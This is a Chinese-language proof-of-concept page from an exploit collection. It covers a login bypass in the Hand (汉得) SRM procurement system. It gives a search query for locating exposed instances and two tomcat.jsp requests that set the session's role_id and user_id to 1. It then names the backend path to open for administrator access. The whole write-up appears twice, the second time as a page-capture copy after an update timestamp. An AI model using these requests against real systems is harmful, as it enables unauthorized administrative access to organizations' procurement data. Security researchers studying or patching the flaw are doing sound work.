Awesome-POC/Web应用漏洞/汉得SRM tomcat.jsp 登陆绕过漏洞.md

# 汉得SRM tomcat.jsp 登陆绕过漏洞

## 漏洞描述

汉得SRM tomcat.jsp 文件存在登陆绕过漏洞, 攻击者通过发送请求包，可以获取后台管理员权限

## 漏洞影响

汉得SRM

## 网络测绘

```
web.body="汉得SRM"
```

## 漏洞复现

登陆页面

![image-20230828164434474](images/image-20230828164434474.png)

验证POC (Tomcat session操控)

```
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
```

![image-20230828164451105](images/image-20230828164451105.png)

访问跳转后台

```
/main.screen
```
update 2024-11-06 14:10:36 +08:00			`# 汉得SRM tomcat.jsp 登陆绕过漏洞`

			`## 漏洞描述`

			`汉得SRM tomcat.jsp 文件存在登陆绕过漏洞, 攻击者通过发送请求包，可以获取后台管理员权限`

			`## 漏洞影响`

			`汉得SRM`

			`## 网络测绘`

			```
			`web.body="汉得SRM"`
			```

			`## 漏洞复现`

			`登陆页面`

			`![image-20230828164434474](images/image-20230828164434474.png)`

			`验证POC (Tomcat session操控)`

			```
			`/tomcat.jsp?dataName=role_id&dataValue=1`
			`/tomcat.jsp?dataName=user_id&dataValue=1`
			```

			`![image-20230828164451105](images/image-20230828164451105.png)`

			`访问跳转后台`

			```
			`/main.screen`
			```